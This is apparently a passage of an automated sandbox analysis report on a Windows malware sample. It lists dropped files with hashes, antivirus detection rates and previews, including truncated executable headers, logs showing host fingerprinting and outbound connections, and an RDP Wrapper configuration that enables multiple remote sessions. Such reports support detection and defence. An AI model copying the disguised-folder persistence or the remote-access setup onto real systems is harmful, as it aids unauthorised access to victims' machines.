                                                                                                                                                SHA1:F444EE94302C2B1DC47C2875DEE4DC9DE54FC894
                                                                                                                                                SHA-256:A46845BE312BD7F0AC0D287569C1BB86821D57A4ACC0DDA179C4DA43E7CC82D1
                                                                                                                                                SHA-512:E5A80DCAD147B0AFC2BB4EA427E2E9A7DDF8F0132891EF34AC312AFAC8E41F5D754DB14EEB635E0589C426AE00EF17A26BE3612333090ED0810736843DD6DA60
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:8...!..8.'+1...i.S...LB.........d..X...{w..&.t.%..#`..]....FTY.({.......#
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):721
                                                                                                                                                Entropy (8bit):6.6765125652697055
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:r1MTqqqqqqqqqP6Msy/pznnL8JVmyaEoIEPiGv:rOTqqqqqqqqqP6MNBnmDov
                                                                                                                                                MD5:42981CD0425487F54154988A1FC6B498
                                                                                                                                                SHA1:D36FB7BF6AA80984CB3909B597EE01FFB6F6EB4A
                                                                                                                                                SHA-256:D5B0E5DBF32DB3BBFA12E1A479180309FE99573EE1B2E532BB420161BA9564C0
                                                                                                                                                SHA-512:315D97F3E9487D89ED18BB3AB7D7567BF399A9054ADCB857A924944F6BA107C1D5F154CD3DD4933135B22663E25B4E2FDF811A6D77836B1EA5C6993C2D5EEA06
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:......i>......*J...uO....T{...{..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M.C..7.B..eR~V.j}......I..:.'.............7.jX...........NTCP2.@.caps=.4;.s=,OPT11aEh9O04xL8nKzGntN6kadNT9A2DTEKOHMCqBR4=;.v=.2;..........SSU2.q.caps=.4;.i=,6NZ1ZUF0XzTJH4T9cNRX54Q9rWEJlXWb8iDjDcznlS8=;.s=,w0jflIrRnNICclGsvmO-E8wPKLuMcSjXPoeraOMSiH8=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.60;.`.`U"&..}.=.Gm..F.MbJ'..uB......@n....!@.+....A;N..r..u...
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):455
                                                                                                                                                Entropy (8bit):6.138550964074035
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:r1UngzZIlGgzZIlGgzZIlGgzZIlGgzZIlGgzZIlGgzZIlGgzZIlGgzZIlGgzZIl8:r1MTqqqqqqqqqP6MzeFF
                                                                                                                                                MD5:EA558EA4FD7C9A9750DB5F528838FF11
                                                                                                                                                SHA1:1FF39A749C41A19EBB9DF74CCFED128A91F7960D
                                                                                                                                                SHA-256:24E1BF74C03FBE8D48F23DBA3433F5740C22E471D9DFE343C39404888B928ECB
                                                                                                                                                SHA-512:FD388535E0C6B20203F8CAB0264D125B31E08A200720CC8437730D22417E2679D0F6B6798FB830A7F0409CDDD8C55C22242F1177CF85DFC73E363765A7E0B18D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:......i>......*J...uO....T{...{..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M.C..7.B..eR~V.j}......I..:.'.........p.#...4.p#....S$_.nL.<.+ojh..jP...Jo...,3zN.Ph.7.Iw..T|.s:..}
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):96
                                                                                                                                                Entropy (8bit):6.207205599611886
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:xk5bStwYfhtBkYqJUI0gFYbRKQr0CwK:xk9SBkYqJggFYb840K
                                                                                                                                                MD5:20B2B98A967C49662C19ABED42EBDB9D
                                                                                                                                                SHA1:804C454104D85770EE003433C7E879E4CD709DA6
                                                                                                                                                SHA-256:4254DD0702BD9A7F3C25936D1B0FD65183AC7BCBF873201F02932C11AD25F036
                                                                                                                                                SHA-512:CDC0261D8FD72805573C4E7E5E1B8763027BD374E1C49252801DA5010BD63454D453159C0D271FCFE786C8203F4A39266FD8E167BE0293FA6A138DACBFA1CC87
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):9146880
                                                                                                                                                Entropy (8bit):6.674868432808522
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                                                                                                                                                MD5:676064A5CC4729E609539F9C9BD9D427
                                                                                                                                                SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                                                                                                                                                SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                                                                                                                                                SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                 Preview:MZ/DOS stub ("This program cannot be run in DOS mode"), PE32+ header (PE..d, machine x86-64), sections .text .data .rdata .pdata .xdata .bss .edata .idata .CRT .tls .reloc; remaining preview bytes are non-printable
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):89088
                                                                                                                                                Entropy (8bit):6.205377670389132
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:y5rUJUohYhdi9PbahfxaxQo9uYN/kpYBbMQGwryimzgvmak7EoKk1dhJJY9V/Sbf:digoZax39NN/DBgQVmzg5kF/ctIN
                                                                                                                                                MD5:BB070CFBD23A7BC6F2A0F8F6D167D207
                                                                                                                                                SHA1:BDB8961F8AFB999AECE60BF1EF3E49E8E2349F7B
                                                                                                                                                SHA-256:C0860366021B6F6C624986B37B2B63D460DD78F657FC504E06F9B7ABBFDC2565
                                                                                                                                                SHA-512:93D052675636FBE98204EF8521B9F10F8A0CBCAC40E8835AD8249DAFD833C29B7F915A898671B21064D4ED6D04DA556D9D3647D03EB93232ADB2ACD2D7DC1F8A
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                 Preview:MZ/DOS stub ("This program cannot be run in DOS mode"), PE32+ header (PE..d, machine x86-64), sections .text .data .rdata .pdata .xdata .bss .idata .CRT .tls .reloc (no .edata); remaining preview bytes are non-printable
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4379
                                                                                                                                                Entropy (8bit):5.3537078850672035
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:idHwW8J9VLyHzHH0H20HaSHomHu5SHSkmHSm5SHFmHOn5SHvSHhOmHX5SHpPR1zs:AzOTuTn0W06SLO5Suz5Skc5SPS/35SJM
                                                                                                                                                MD5:C6401B39F275E4F2BC3540EEBE96AEC6
                                                                                                                                                SHA1:30FB5AEFF27A4DDA562C94C7AAE85C5F57D8C212
                                                                                                                                                SHA-256:8BE17A7F07D957415F37B26F29D3EA82D412F4B50A70A6167689E794BB015F62
                                                                                                                                                SHA-512:CAA510C4E00E2BD5302CB65FF181DF27DC466FCCC030E9265760218E6ECE30BA3E2299417C5EE51280B5336FAC4D1792D09CCFFB97C26A52C142047B50684C88
                                                                                                                                                Malicious:false
                                                                                                                                                 Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log)
                                                                                                                                                 [I] (debug_init) -> Done
                                                                                                                                                 [I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)
                                                                                                                                                 [D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)
                                                                                                                                                 [I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)
                                                                                                                                                 [D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)
                                                                                                                                                 [I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)
                                                                                                                                                 [I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)
                                                                                                                                                 [I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)
                                                                                                                                                 [E] (package_install) -> Failed(pkg_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,tgt_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,err=00000003)
                                                                                                                                                 [I] (fs_file_read) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):456
                                                                                                                                                Entropy (8bit):3.2341395630162877
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:Ml8Pi7t8+d/fQfjfEWNfElsfghFfShFfgmSem4emzYWr:k8APd/oj8i8ls0FSFgID7r
                                                                                                                                                MD5:40AB00517F4227F2C3C334F1D16B65B4
                                                                                                                                                SHA1:F8D57AF017E2209B4FB24122647FD7F71B67C87C
                                                                                                                                                SHA-256:4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
                                                                                                                                                SHA-512:75D74306F043B864295F09A60C19A43494C226664733C99318989CE5C22CB9395BB407FB5C8C0268AD9184A79813304ED5FC943A6B53DB54F5F225CDA31650E3
                                                                                                                                                Malicious:false
                                                                                                                                                 Preview (UTF-16LE text, null bytes stripped):Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d} D:AI(D;;FA;;;BU)(A;;FA;;;BA)(A;OICIID;FA;;;BA)(A;ID;FA;;;SY)(A;OICIIOID;FA;;;CO)(A;OICIIOID;FA;;;SY)(A;OICIID;0x1301ff;;;IU)(A;OICIID;0x1301ff;;;SU)(A;OICIID;0x1301ff;;;S-1-5-3)
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):105984
                                                                                                                                                Entropy (8bit):6.285421743969757
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:BQrD6CCk73WUJ/2WEvooF8VohjBdmaKqYdpFXaRQSCYA8CSs8qgu06wCYA8CSs8V:BA6sDl/2WEvo0DipFXaRQO
                                                                                                                                                MD5:6E01ED70D02CE47F4D27762A9E949DEE
                                                                                                                                                SHA1:32B9199EBBD7891CF0091B96BF3B2C9303AB7B7A
                                                                                                                                                SHA-256:EFB9B3D4356071EE8FE66979140E7435371EC668088A68786C6FDCEDF29D7376
                                                                                                                                                SHA-512:B21C8F79553EE513F6C48EFA618C20FB82CBC77EDE95579C28C21D8BB433B93D108CEF442B48ECBDABD0B06AA5C8AEDC8B26316167D1793A0E972B38D4210854
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                 Preview:MZ/DOS stub ("This program cannot be run in DOS mode"), PE32+ header (PE..d, machine x86-64), sections .text .data .rdata .pdata .xdata .bss .edata .idata .CRT .tls .reloc; remaining preview bytes are non-printable
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4940
                                                                                                                                                Entropy (8bit):5.29136499790954
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:idHuN8J9VLr70He5555555555o55555555555555D:AONOTf70+5555555555o55555555555h
                                                                                                                                                MD5:49656B68BFF8175EBB4C7DCF41B24478
                                                                                                                                                SHA1:C3DF786695550FF65525BB954B10D2A020DDBD7D
                                                                                                                                                SHA-256:06C8EFD08247B4B3B616B805E4002E559BF6E48F855B3111FC9E48DF442B5616
                                                                                                                                                SHA-512:669EA6862D911F3B4962FCC47703A7DD3FC21A5AA83E3CD3C7341DBACE02D95A30831CE4618BA12D4E94ACFDE910B828C538B9D6370DA07E254A9859A663F46E
                                                                                                                                                Malicious:false
                                                                                                                                                 Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log)
                                                                                                                                                 [I] (debug_init) -> Done
                                                                                                                                                 [D] (ini_get_sec) -> Done(name=main)
                                                                                                                                                 [D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)
                                                                                                                                                 [I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)
                                                                                                                                                 [D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)
                                                                                                                                                 [I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)
                                                                                                                                                 [D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)
                                                                                                                                                 [I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)
                                                                                                                                                 [I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)
                                                                                                                                                 [I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)
                                                                                                                                                 [I] (net_init) -> Done
                                                                                                                                                 [I] (ebus_init) -> Done
                                                                                                                                                 [I] (ebus_subscribe) -> Done(handler=0x00007ff8ba4fa8a0)
                                                                                                                                                 [I] (tcp_connect) -> Done(sock=0x3c0,host=7
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):129536
                                                                                                                                                Entropy (8bit):6.2852879161990645
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:UmeFYyUJdEqzx2LVJ4ngXsNXGRqnbxeGqS/h0E0P3j4NBtRLBhBr:UZUJdhxCJ4ngg46weh0dr4vnV
                                                                                                                                                MD5:88E6178B0CD434C8D14710355E78E691
                                                                                                                                                SHA1:F541979CAD7EE7C6D8F2B87A0F240592A5DC1B82
                                                                                                                                                SHA-256:7B40349481AD6C522A23FB3D12D6058EC0A7C5B387348FB4AE85135EE19C91A4
                                                                                                                                                SHA-512:C4330A9EE1E69785420AABCFD1991AAAEB0F1764EB7E857F0C86161F61E1FFD467B458A2D458D3C55BB76D00F26FAC481D026443AB0796D0AEF38BF06CD84B8F
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                 Preview:MZ/DOS stub ("This program cannot be run in DOS mode"), PE32+ header (PE..d, machine x86-64), sections .text .data .rdata .pdata .xdata .bss .edata .idata .CRT .tls .reloc; remaining preview bytes are non-printable
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4753
                                                                                                                                                Entropy (8bit):5.4440687959784535
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:idHeN8J9VLoDNVDNVDN2DNVDNVDNVDNVDNVDNVDNVDNVDNVDND:A+NOTePPIPPPPPPPPPD
                                                                                                                                                MD5:196434F541505FEC30FD2275A3151AD2
                                                                                                                                                SHA1:43FFE2BEB86F3772D577ED7FAD4C7974F1213C82
                                                                                                                                                SHA-256:A7E9A3EA3F86531FDD310F71C6F32D36641EB7C21F8C27D3317ADBE5FF36EF2F
                                                                                                                                                SHA-512:CE8CBF6FA409D424AA1137E5E5005CE3589EF46C05E230683403503A236D224E7DBF59D1A45AE7369781E8C62EBEF9E9F1435E7E28F645A642308781348AAB22
                                                                                                                                                Malicious:false
                                                                                                                                                 Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log)
                                                                                                                                                 [I] (debug_init) -> Done
                                                                                                                                                 [D] (ini_get_sec) -> Done(name=main)
                                                                                                                                                 [D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)
                                                                                                                                                 [I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)
                                                                                                                                                 [D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)
                                                                                                                                                 [I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)
                                                                                                                                                 [D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)
                                                                                                                                                 [I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)
                                                                                                                                                 [I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)
                                                                                                                                                 [I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)
                                                                                                                                                 [I] (scm_init) -> Done
                                                                                                                                                 [I] (net_init) -> Done
                                                                                                                                                 [I] (ebus_init) -> Done
                                                                                                                                                 [I] (proxy_init) -> Done
                                                                                                                                                 [I] (ebus_subscribe) -> Done(handler=0x00007ff8b919
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4
                                                                                                                                                Entropy (8bit):2.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:9:9
                                                                                                                                                MD5:006F29D8E822B9241020AEC2495EF819
                                                                                                                                                SHA1:6510BEB08A14B6BCC74D32031C1B19AA07169CF1
                                                                                                                                                SHA-256:69FF245F90727BBEFA5B1F82E2429FF74F31A6A5385B5129A2FE3378DCF200F1
                                                                                                                                                SHA-512:16916BC4477F6FC1AE1132D2F5D2B9587650DC44E23DE15E0FE787AFE23175E0E236C020C753BA5158F688BEACDA523AAFB7EC1DF82B6F7619573C90A48742E8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:wgNj
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):37376
                                                                                                                                                Entropy (8bit):5.7181012847214445
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                                                                                                                MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                                                                                                                SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                                                                                                                SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                                                                                                                SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):115712
                                                                                                                                                Entropy (8bit):6.25860377459178
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:+8zEo3EM0MBfGCqx22eMO4HROUeS2qjVO+n98TLmifu:LzEms12D4xOU31n98TLmh
                                                                                                                                                MD5:BD1D98C35FE2CB3E14A655AEDE9D4B01
                                                                                                                                                SHA1:49361C09F5A75A4E2D6E85FBDA337FC521770793
                                                                                                                                                SHA-256:961C65CFDF0187A945AD6099EFD9AF68D46D36EC309A2243F095EF739EE9AC7E
                                                                                                                                                SHA-512:74BFD70A08E2CB86AF10B83D0CFD723A24613C9E6E2018CDC63BD425D45845C1214BF68115E04F95572684F27A0CF52D271E2419F8056E0A0467B88507D132D4
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................P.......p....`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):12514
                                                                                                                                                Entropy (8bit):5.33408248494771
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:CFdHr+54yclD8cm9FLQIhs5ZR5mLU5+sR5HR5OKXbem5ZR5mLU5+sR5HR5OKXbeY:idHxN8J9VLjvvuvvvvvvvvvD
                                                                                                                                                MD5:94A7B22F4F218FD48101B2FA3B0D7B79
                                                                                                                                                SHA1:C078E2C913C9E2BF233B69A0C63C23290A4DFEA2
                                                                                                                                                SHA-256:99A7F1976DCB1B5C7980CFDB43025B069EC97DCDAC8DC3DA083B752A7787C4B3
                                                                                                                                                SHA-512:99781CEB5AAA844AA5E24AED13EE0679DA8CEE639AACB0621D75E810F1A664B24998C0BF03414A55CE36783454FA03A714A4602B81E4A50D9DE82046D46EC6BB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (sam_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8b915e342)..[I] (tcp_connect) -
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):91136
                                                                                                                                                Entropy (8bit):6.2041507656664825
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:SgYI/+tvE0A2HTsPtbNqnXi2h+t3w8S31+g5KvSxY:SgYIl2HIPtbNkrhPl+4K6e
                                                                                                                                                MD5:CB4F460CF2921FCD35AC53F4154FCBE0
                                                                                                                                                SHA1:AFD91433EF0C03315739FB754B16D6C49D2E51F2
                                                                                                                                                SHA-256:D6B5B5303D7079CF31EA9704E7711A127CFE936EA108CDFFF938C7811C6EDA31
                                                                                                                                                SHA-512:BEE872D6B1226409C472636255AE220BA8E0950C0D65DD0D8B9F3E90D43B65FFE2133B33648452C34A3F1BCA958F10BAF3FADBA5BF4228057928F4EEAC7AB600
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....`......Y.....................................................`... ..............................................................`..................d............................I..(......................h............................text...X...........................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:Generic INItialization configuration [SLPolicy]
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):456534
                                                                                                                                                Entropy (8bit):5.450314708570292
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:ElNN33L+MUIiG4IvREWddadl/Fy/kY5Psv:EX33L+MBdadl/Fy/kr
                                                                                                                                                MD5:AC8B2EA4A310D6748A8845C235A3CDC8
                                                                                                                                                SHA1:0B489969C7D95411E4104B9BB952C0024EDE1616
                                                                                                                                                SHA-256:77BA4F6F25BA1050847C22B7AAF1E662650A99A15222466091FB056F436048E3
                                                                                                                                                SHA-512:0E807AF4D4E0D2F71FB8BE93DFCBCE62F3077E7C94B993529A0012088304A1B34BEDF8915EA23A83611FAB66495B1F8359225DBF95ED3F37C16607257217F191
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-11-24..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):10480965
                                                                                                                                                Entropy (8bit):6.710750822103746
                                                                                                                                                Encrypted:false
